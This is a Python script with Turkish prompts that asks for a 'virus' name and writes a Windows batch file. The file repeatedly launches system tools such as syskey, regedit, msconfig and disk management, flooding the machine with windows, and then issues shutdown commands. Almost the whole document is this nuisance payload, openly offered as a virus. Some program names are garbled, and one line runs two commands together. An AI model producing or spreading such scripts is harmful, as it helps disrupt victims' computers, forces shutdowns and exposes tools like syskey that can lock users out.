import os

add = input("Virus adını giriniz > ")
dosyz = open(add+".bat","a")
butun = (add+".bat")


dosyz.write('''color a 
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exestart calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe
start calc.exe
start diskmgmt.msc
start devmgmt.msc
start dfgr.msc
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start mspaint.exe
start osk.exe
start msconfig.exe
start ntbackup.exe
start mplay32.exe
start syskey.exe
start write.exe
start rasphone.exe
start explorer.exe
start cleanmgr.exe
start charmap.exe
start magnify.exe
start iexpress.exe
start rasphone.exe
start progman.exe
start odbcad32.exe
start syskey.exe
start regedit32.exe

color b
start calc
start
start
color b
shutdown
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
color a 
shutdown
color a 
shutdown
start
color a
shutdown 
start
color b
start calc
start
start
color b
shutdown
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start
start
start
start
start
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
start calc
''')
